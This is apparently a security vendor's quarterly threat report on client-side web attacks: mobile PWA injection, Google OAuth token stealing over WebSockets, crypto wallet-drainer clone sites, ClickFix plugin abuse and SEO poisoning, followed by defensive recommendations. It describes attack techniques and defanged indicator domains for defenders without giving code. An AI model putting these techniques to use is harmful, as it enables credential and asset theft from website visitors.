Executive Summary
Q2 2025 continued to demonstrate the scale and sophistication of client-side attacks, affecting websites across a wide range of industries, with a particular focus on WordPress-powered platforms. cside’s research uncovered over 72,000 compromised websites, revealing how attackers are relying on JavaScript-based delivery mechanisms, third-party supply chain vulnerabilities, and deceptive browser based social engineering tactics such as fake browser updates.
For CISOs, digital risk leaders, and security stakeholders, this report outlines the most critical campaigns detected this quarter, presenting both technical detail and strategic insight to support proactive decision-making.
Key Insight for Executives: For today’s executives, modern cyber threats increasingly exploit browser-based interactions and user trust in common CMS platforms. Defending against them requires visibility into runtime behaviors, rigorous script governance, and coordinated threat intelligence. Additionally, client-side attacks targeting cryptocurrency platforms and payment environments pose outsized risks, despite representing a smaller volume of total incidents.
Major Client-Side Campaigns
1. Chinese PWA Injection Scam – Mobile Targeting with Adult Themes
- First spotted in June 2025, this campaign has already hit over 10,000 websites and is still active.
- Root Cause: Injected code into service worker and PWA logic of popular themes and templates.
- Attack Infrastructure: Hosted on rotating subdomains linked to adult-themed APK lures.
- Attack Infrastructure: Domains like qaztool[.]com and its subdomains were responsible for injecting iframes that took over the entire viewport.
- What makes this attack unique?
- It only triggers if you’re using a mobile device.
- Encourages installation of malicious PWAs posing as adult apps
- Uses fingerprinting and cloaking to evade sandboxes
- Key Takeaway: This attack doesn’t just affect browsers, it puts user devices at long-term risk.
2. Weaponized Google OAuth + WebSocket Abuse
- Detected: May 2025
- Websites Impacted: 22
Root Cause: Legitimate OAuth callback URLs hijacked to trigger malicious JavaScript functions.
Attack Infrastructure: Abuse of Google OAuth response tokens with dynamic eval(atob(...)) payloads and obfuscated WebSocket endpoints.
Notable Traits:
- Script only activates after user authenticates with Google
- Acts as a session-aware beacon or token stealer
- WebSocket exfiltration method evades traditional traffic monitoring
What makes this matters: Attackers are hijacking trusted login systems like Google OAuth, something users inherently trust.
3. CoinMarketCap Clone - Fake Wallet Drainer
- Detected: May 2025
- Websites Impacted: Targeted, high-value clones and traffic interception via SEO spoofing
Root Cause: Fake CoinMarketCap clones injected into ad networks and typo-squatted domains
Attack Infrastructure: Spoofed domains mimicking CoinMarketCap UI, with embedded credential stealers and wallet drainers
Notable Traits:
- Pixel-perfect replication of CoinMarketCap’s frontend
- Credential harvesting via fake login modals
- Wallet drainer scripts triggered post-authentication
- In some versions, used ChatGPT UI as secondary lure
Strategic Risk: Impersonation of highly trusted crypto platforms phishing leads to real asset loss and undermines Web3 trust.
4. ClickFix Abuse – Ruthless Multi-Platform Code Injection
- Detected: May 2025
Root Cause: Malicious use of the ClickFix plugin to inject arbitrary JavaScript into multiple CMS platforms.
Attack Infrastructure: Attackers leveraged ClickFix’s cross-platform compatibility to drop obfuscated payloads on WordPress, Joomla, and custom CMS setups.
Notable Traits:
- Dynamic script injection with contextual targeting
- Payloads included redirectors, tracking beacons, and skimmers
- Hard to trace due to use of plugin-native functions and randomized script paths
Strategic Risk: Persistent access across platforms enables attackers to rotate payloads post-compromise without further exploitation.
5. scriptapi[.]dev – SEO Poisoning for Fake Services
- Detected: April 2025
- Websites Impacted: ~500
Root Cause: Injected via fake script source or hijacked analytics plugin.
Attack Infrastructure: Spoofed script hosts injected hidden links and comment spam.
Notable Traits:
- Cloaked keyword stuffing targeting search engine crawlers
- Injected hundreds of outbound links invisibly
- Often paired with expired domain redirection
Strategic Risk: Major SEO penalties; used to manipulate search rankings for scam sites.
Strategic Recommendations for Executives and CISOs
As client-side threats become more sophisticated and evasive, enterprise defenders must adopt a layered and forward-looking approach to protect user trust, business continuity, and regulatory posture. Based on trends observed in Q2 2025, c/ide recommends the following strategic actions:
1. Client-Side Risk Governance
Make this a priority : Review and monitor all third-party JavaScript code before and after deployment. for all third-party JavaScript assets. Every script, plugin, or dependency introduced into the user experience should be tracked, verified, and monitored in production environments.
2. Runtime Detection Capabilities
Invest in behavior-based monitoring of browser environments to detect malicious actions like iframe injection, credential skimming, redirection loops, or unauthorized DOM manipulation threats often invisible to static scanning tools.
3. Web CMS as a High-Value Target
Platforms like WordPress remain prime targets for attackers due to widespread adoption and inconsistent patch hygiene. Treat CMS environments with enterprise-grade rigor, including auto-patching, plugin vetting pipelines, and regular integrity checks.
4. Zero Trust for JavaScript Delivery
Assume no script is safe, apply Zero Trust rules to all JavaScript, even code from trusted sources. Assume compromise by default, enforce CSP (Content Security Policy), and log every script execution and network request for anomaly detection and audit purposes.
5. Response Playbooks & Threat Simulations
Develop and rehearse incident response playbooks focused on:
- Supply chain JavaScript compromises
- Client-side injection attacks
- Credential theft via fake login modals
Use real-world scenarios like Magecart, PWA abuse, and plugin hijacking as the basis for tabletop exercises.
Key Metrics Overview
Number of Websites Impacted by Attack Type
Strategic Trends Observed in Q2 2025
During Q2 2025, several evolving patterns defined the shifting client-side threat landscape:
1. Mobile-First Client-Side Attacks
Malicious campaigns increasingly prioritize mobile device targeting, particularly Android. From PWA-based redirections to APK dropper lures, attackers are optimizing payloads for mobile browsers where detection and sandboxing remain limited.
2. Weaponization of Legitimate Web Functionality
Campaigns in Q2 abused OAuth flows, service workers, and browser-native APIs to disguise malicious activity as normal user behavior. Examples include session hijacking through Google OAuth callbacks and persistent redirects injected via PWA service workers.
3. Erosion of Trust in Browser UI
We observed a rise in full-screen hijacks, fake login modals, and pixel-perfect clones of trusted platforms like CoinMarketCap. These attacks exploit user trust in the visual interface of the browser, bypassing traditional URL-based security cues.
4. WordPress Exploitation Remains Pervasive
WordPress continued to serve as the primary entry point for client-side compromise. Unpatched plugins and insecure themes enabled persistent injection via tactics like jquery.bond backdoors and ClickFix plugin abuse.
5. Cross-Platform Code Injection via ClickFix
The ClickFix plugin was abused to deploy client-side malware across WordPress, Joomla, and custom CMS platforms. Its flexible injection capabilities allowed attackers to tailor payloads by environment ranging from credential stealers to ad fraud scripts. This marks a shift toward platform-agnostic exploitation, extending the reach of client-side attacks beyond WordPress alone.
Compliance and Regulatory Impact
This isn’t just technical client-side breaches can mean GDPR fines, lawsuits, and lost customer trust. Organizations must treat the browser-side environment as part of their regulated infrastructure.
1. General Data Protection Regulation (GDPR)
Client-side malware, redirects, or third-party script abuse can qualify as a breach of data protection obligations under Article 32 of the GDPR.
Implications:
- Fines up to €20 million or 4% of global annual revenue, whichever is higher
- Mandatory breach disclosure to supervisory authorities and affected users
- Reputational damage due to public reporting obligations
2. PCI-DSS Risk: Payment Page Skimming & Magecart
Client-side attacks like Magecart, Formjacking, and checkout skimmers directly violate PCI-DSS v4.0 requirements, particularly those related to client-side script control and integrity.
Consequences:
- Regulatory fines and potential loss of PCI compliance
- Breach notification requirements under PCI Council guidelines
- Brand damage, loss of consumer trust, and legal exposure Given the ubiquity of JavaScript-based checkout flows, securing browser-side environments is no longer optional for PCI-compliant merchants.
3. California Consumer Privacy Act (CCPA)
Malicious scripts that exfiltrate or misuse personal information can trigger enforcement actions under the CCPA, including:
- Private right of action for California consumers
- Statutory damages for data breaches, even without regulatory involvement
- Additional scrutiny from state regulators if negligence is demonstrated
4. Brand Reputation & Legal Exposure
Beyond fines and formal penalties, client-side threats create compounding business risks:
- Customer lawsuits and loss of user trust
- Blocklisted by search engines and ad platforms (e.g., Google Safe Browsing)
- Affiliate network bans or revenue loss due to script-based fraud or hijacking
Risk Forecast Review - Q2 2025
At the start of Q2, cside projected several high-risk developments based on patterns from Q1. Below is a review of those forecasts, highlighting which threats materialized and which remain emerging or evolving.
Risk Forecast for Q3 2025
Based on attack trends observed in Q2, cside forecasts the following developments for Q3:
Strategic Recommendations for Executives and CISOs
Organizations must evolve beyond traditional perimeter-based defenses and embrace real-time browser security monitoring as a core component of their risk management strategy. Based on Q2 2025 insights, cside recommends the following actionable measures:
1. Client-Side Risk Governance
Establish formal governance policies for all client-side assets:
- Mandate pre-deployment review and post-deployment monitoring for third-party JavaScript
- Maintain an approved script inventory with versioning, hash validation, and integrity checks
2. Runtime Detection Capabilities
Deploy behavior-based monitoring tools to capture suspicious activity in the live browser environment, such as:
- Iframe injections and full-page takeovers
- Unauthorized DOM manipulation
- Unexpected outbound network connections These detections should trigger alerts before users are impacted.
3. Zero Trust for Third-Party Content
Adopt Zero Trust principles for external content:
- Apply Content Security Policy (CSP) headers to restrict asset loading
- Enforce Subresource Integrity (SRI) for all third-party scripts
- Log and audit all dynamic script loads and inline script executions
4. Enhanced WordPress Security Posture
Harden your CMS surface area, especially WordPress:
- Enforce automated patching of core, plugin, and theme components
- Only allow vetted, security-audited plugins and themes
- Monitor for unauthorized admin account creation and privilege escalation
5. Prepare and Test Incident Response Playbooks
Develop and rehearse playbooks focused on modern client-side threats:
- JavaScript injection (e.g., Magecart, wallet drainers)
- Supply chain breaches (e.g., plugin or CDN compromise)
- SEO poisoning and domain reputation damage Include clearly defined communication and disclosure workflows for regulatory bodies (GDPR, CCPA, PCI-DSS) in case of breach.
Final Words
The threat landscape in 2025 continues to shift. Attackers no longer need to breach servers; they only need to compromise a script. The browser is now the front line.
To stay ahead, organizations must move beyond server-centric defense models and invest in real-time, client-side threat detection and response. Even low-frequency, high-impact threats like crypto wallet drainers or card skimming attacks can result in significant financial loss and regulatory exposure.
At cside, we remain committed to uncovering and publishing emerging threats to empower defenders, strengthen digital trust, and make the web safer for everyone.